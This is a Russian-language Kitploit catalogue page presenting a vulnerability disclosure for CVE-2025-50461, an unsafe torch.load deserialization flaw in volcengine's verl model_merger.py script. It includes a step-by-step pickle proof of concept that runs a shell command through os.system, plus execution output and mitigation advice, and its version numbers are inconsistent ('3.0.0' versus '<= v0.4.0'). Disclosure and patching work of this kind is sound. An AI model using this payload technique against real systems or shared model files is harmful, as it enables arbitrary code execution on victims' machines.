Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-50461 — Technical Details and Exploit for CVE-2025-50461 | Kitploit
Инструменты/GitHubGitHub/anchor0221/cve-2025-50461
Payload GenerationVulnerability AnalysisExploitationPapers & ResearchLearning & EducationBinary Exploitation
GitHubanchor0221/cve-2025-50461

CVE-2025-50461

Technical Details and Exploit for CVE-2025-50461

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-50461: Удаленное выполнение кода через небезопасную десериализацию модели в Verl

Статус: RESERVED
Этот идентификатор CVE назначен, но еще не опубликован в официальном списке CVE.

Уязвимость десериализации существует в volcengine's verl 3.0.0, конкретно в скрипте scripts/model_merger.py при использовании бэкенда "fsdp". Скрипт вызывает torch.load() с weights_only=False для пользовательских .pt файлов, что позволяет злоумышленникам выполнять произвольный код при загрузке специально созданного файла модели. Злоумышленник может воспользоваться этим, убедив жертву загрузить и разместить вредоносный файл модели в локальной директории с определенным шаблоном имени файла. Эта уязвимость может привести к выполнению произвольного кода с привилегиями пользователя, запускающего скрипт.

Описание

Затронутый репозиторий

  • Проект: volcengine/verl
  • Затронутые версии: <= v0.4.0
  • Файл: scripts/model_merger.py
  • Постоянная ссылка GitHub: https://github.com/volcengine/verl/blob/v0.3.0.post1/scripts/model_merger.py#L87
  • Зависимость: PyTorch < 2.6.0

Доказательство концепции (PoC)

Шаг 1: Создание вредоносного файла модели (malicious.pt)

root@kitploit:~
import pickle
import os

class Malicious:
    def __reduce__(self):
        return (os.system, ("mkdir HACKED!",))

with open("malicious.pt", "wb") as f:
    pickle.dump(Malicious(), f)

Шаг 2: Переименование и размещение

root@kitploit:~
mv malicious.pt model_world_size_4_rank_0.pt
mkdir TESTS
mv model_world_size_4_rank_0.pt TESTS/

Шаг 3: Выполнение уязвимого скрипта

root@kitploit:~
python scripts/model_merger.py --backend="fsdp" --local_dir="TESTS" --hf_model_path="TESTS"

Результат

root@kitploit:~
root@99137c7690ee:/workspace/verl-main# python scripts/model_merger.py --backend="fsdp" --local_dir="TESTS" --hf_model_path="TESTS"
Traceback (most recent call last):
  File "/workspace/verl-main/scripts/model_merger.py", line 440, in <module>
    convert_fsdp_checkpoints_to_hfmodels()
  File "/workspace/verl-main/scripts/model_merger.py", line 88, in convert_fsdp_checkpoints_to_hfmodels
    state_dict = torch.load(os.path.join(local_dir, f'model_world_size_{world_size}_rank_{rank}.pt'),
  File "/usr/local/lib/python3.10/dist-packages/torch/serialization.py", line 1384, in load
    return _legacy_load(
  File "/usr/local/lib/python3.10/dist-packages/torch/serialization.py", line 1630, in _legacy_load
    raise RuntimeError("Invalid magic number; corrupt file?")
RuntimeError: Invalid magic number; corrupt file?
root@99137c7690ee:/workspace/verl-main# ls
'HACKED!'   Notice.txt   TESTS   docker   examples   outputs   pyproject.toml       requirements.txt          scripts    test_prime.sh   tmp    verl.egg-info
 LICENSE    README.md    data    docs     patches    recipe    requirements_sglang.txt   setup.py   tests           verl   verl_demo.log

Команда mkdir HACKED! выполняется в системе жертвы.

Смягчение

  • Обновите PyTorch до версии 2.6.0 или новее, которая по умолчанию использует weights_only=True, снижая риски десериализации.
  • Измените код, явно указав weights_only=True при вызове torch.load.
  • Реализуйте проверку целостности файла модели перед загрузкой.
  • Проинформируйте пользователей о недопустимости загрузки моделей из ненадежных источников.

Пример безопасной загрузки:

root@kitploit:~
state_dict = torch.load(path, map_location="cpu", weights_only=True)

Статус CVE

Автор

  • Обнаружено: Ю Ронг (戎誉) и Хао Фан (凡浩)
  • Контакт: [[email protected]]
Скачать инструмент
ПолеЗначение
CVE IDCVE-2025-50461
Оценка CVSSTBD
CWECWE-502: Десериализация ненадежных данных
Дата отчета2025-04-30
Дата раскрытия2025-08-15
Затронутая версия<= v0.4.0
Версия исправления